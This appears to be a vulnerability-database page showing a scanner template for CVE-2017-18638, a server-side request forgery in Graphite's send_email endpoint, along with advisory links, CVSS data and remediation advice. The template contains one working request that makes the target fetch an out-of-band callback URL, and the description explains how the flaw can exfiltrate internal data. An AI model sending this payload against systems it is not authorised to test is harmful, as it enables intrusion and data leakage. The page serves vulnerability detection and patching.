Vulners
Lucene search
Graphite <=1.1.5 - Server-Side Request Forgery
| Reporter | Title | Published | Views | Family All 29 |
|---|---|---|---|---|
 | CVE-2017-18638 | 11 Oct 201922:01 | – | cve |
 | CVE-2017-18638 | 11 Oct 201922:01 | – | cvelist |
 | [SECURITY] [DLA 1962-1] graphite-web security update | 21 Oct 201914:15 | – | debian |
 | CVE-2017-18638 | 11 Oct 201922:01 | – | debiancve |
 | Debian DLA-1962-1 : graphite-web security update | 22 Oct 201900:00 | – | nessus |
| Ubuntu 16.04 ESM / 18.04 ESM / 20.04 LTS / 22.04 LTS : Graphite-Web vulnerabilities (USN-6243-1) | 25 Jul 202300:00 | – | nessus |
 | graphite.composer.views.send_email vulnerable to SSRF | 25 Oct 201913:55 | – | github |
 | CVE-2017-18638 | 11 Oct 201923:15 | – | nvd |
 | Debian: Security Advisory (DLA-1962-1) | 22 Oct 201900:00 | – | openvas |
| Ubuntu: Security Advisory (USN-6243-1) | 26 Jul 202300:00 | – | openvas |
10
id: CVE-2017-18638
info:
name: Graphite <=1.1.5 - Server-Side Request Forgery
author: huowuzhao
severity: high
description: |
Graphite's send_email in graphite-web/webapp/graphite/composer/views.py in versions up to 1.1.5 is vulnerable to server-side request forgery (SSR)F. The vulnerable SSRF endpoint can be used by an attacker to have the Graphite web server request any resource. The response to this SSRF request is encoded into an image file and then sent to an email address that can be supplied by the attacker. Thus, an attacker can exfiltrate any information.
impact: |
An attacker can exploit this vulnerability to access internal resources, potentially leading to unauthorized access, data leakage, or further attacks.
remediation: |
Upgrade to a patched version of Graphite (>=1.1.6) or apply the necessary security patches.
reference:
- http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html
- https://github.com/graphite-project/graphite-web/issues/2008
- https://github.com/advisories/GHSA-vfj6-275q-4pvm
- https://nvd.nist.gov/vuln/detail/CVE-2017-18638
- https://github.com/graphite-project/graphite-web/pull/2499
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2017-18638
cwe-id: CWE-918
epss-score: 0.16948
epss-percentile: 0.96663
cpe: cpe:2.3:a:graphite_project:graphite:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: graphite_project
product: graphite
tags: cve,cve2017,graphite,ssrf,oast,graphite_project,vuln
http:
- method: GET
path:
- '{{BaseURL}}/composer/send_email?to={{rand_text_alpha(4)}}@{{rand_text_alpha(4)}}&url=http://{{interactsh-url}}'
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
# digest: 4a0a004730450220332c6d2c01fd67ebf80361171375e0f4fe53f720680372b8c06fafc56c5f1d8b022100a4fedf9af8362fc8c5365c12d6dad9369ce40695f8ec345d0bf9691d32d46657:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Feb 2026 07:00Current
6.7Medium risk
Vulners AI Score6.7
CVSS 25
CVSS 3.17.5
EPSS0.16948